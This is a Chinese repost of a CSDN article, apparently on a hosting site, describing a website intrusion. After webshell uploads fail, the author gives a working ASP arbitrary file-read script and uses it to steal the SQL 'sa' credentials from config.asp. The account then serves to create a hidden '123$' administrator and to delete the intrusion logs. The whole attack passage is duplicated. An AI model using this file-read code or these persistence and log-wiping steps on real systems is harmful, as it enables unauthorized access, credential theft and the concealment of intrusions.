黑客是如何突破一流检测系统的
发布日期:2021-12-26 14:40 | 文章来源:CSDN
攻击目标:www.***.com
测试过的动作,一句话马,加密马,等。
测试结果:无效,无法上传,无法进入系统。
经过2天的分析,
然后自己搞出了一个代码,利用此代码读取了该网站下的config.asp文件源代码 ------------------------------------------------------------------------- <%
file=Request("file")
Set FSOOBJ=Server.CreateObject("Scripting.FileSystemObject")
if FSOOBJ.fileExists(file) then
Set myfile=FSOOBJ.opentextfile(file,1)
Response.write "<pre>" & server.HTMLEncode(myfile.readall) &"</pre>"
myfile.close
Set myfile=nothing
else
Response.write "file(" & file & ") not exists."
end if
%>
------------------------------------------------------------------------- http://www.***.com/view.asp?file=D:\wwwroot\index.asp 读取到的敏感内容
sql地址:***.***.***.***
帐号:sa 密码:u8f2444f 利用此帐号进入后,建立了123$的隐藏管理员用户,删除入侵日志后退出。
测试过的动作,一句话马,加密马,等。
测试结果:无效,无法上传,无法进入系统。
经过2天的分析,
然后自己搞出了一个代码,利用此代码读取了该网站下的config.asp文件源代码 ------------------------------------------------------------------------- <%
file=Request("file")
Set FSOOBJ=Server.CreateObject("Scripting.FileSystemObject")
if FSOOBJ.fileExists(file) then
Set myfile=FSOOBJ.opentextfile(file,1)
Response.write "<pre>" & server.HTMLEncode(myfile.readall) &"</pre>"
myfile.close
Set myfile=nothing
else
Response.write "file(" & file & ") not exists."
end if
%>
------------------------------------------------------------------------- http://www.***.com/view.asp?file=D:\wwwroot\index.asp 读取到的敏感内容
sql地址:***.***.***.***
帐号:sa 密码:u8f2444f 利用此帐号进入后,建立了123$的隐藏管理员用户,删除入侵日志后退出。
版权声明:本站文章来源标注为YINGSOO的内容版权均为本站所有,欢迎引用、转载,请保持原文完整并注明来源及原文链接。禁止复制或仿造本网站,禁止在非www.yingsoo.com所属的服务器上建立镜像,否则将依法追究法律责任。本站部分内容来源于网友推荐、互联网收集整理而来,仅供学习参考,不代表本站立场,如有内容涉嫌侵权,请联系alex-e#qq.com处理。
相关文章
上一篇:
IDS入侵特征库样本数据建立详解
下一篇: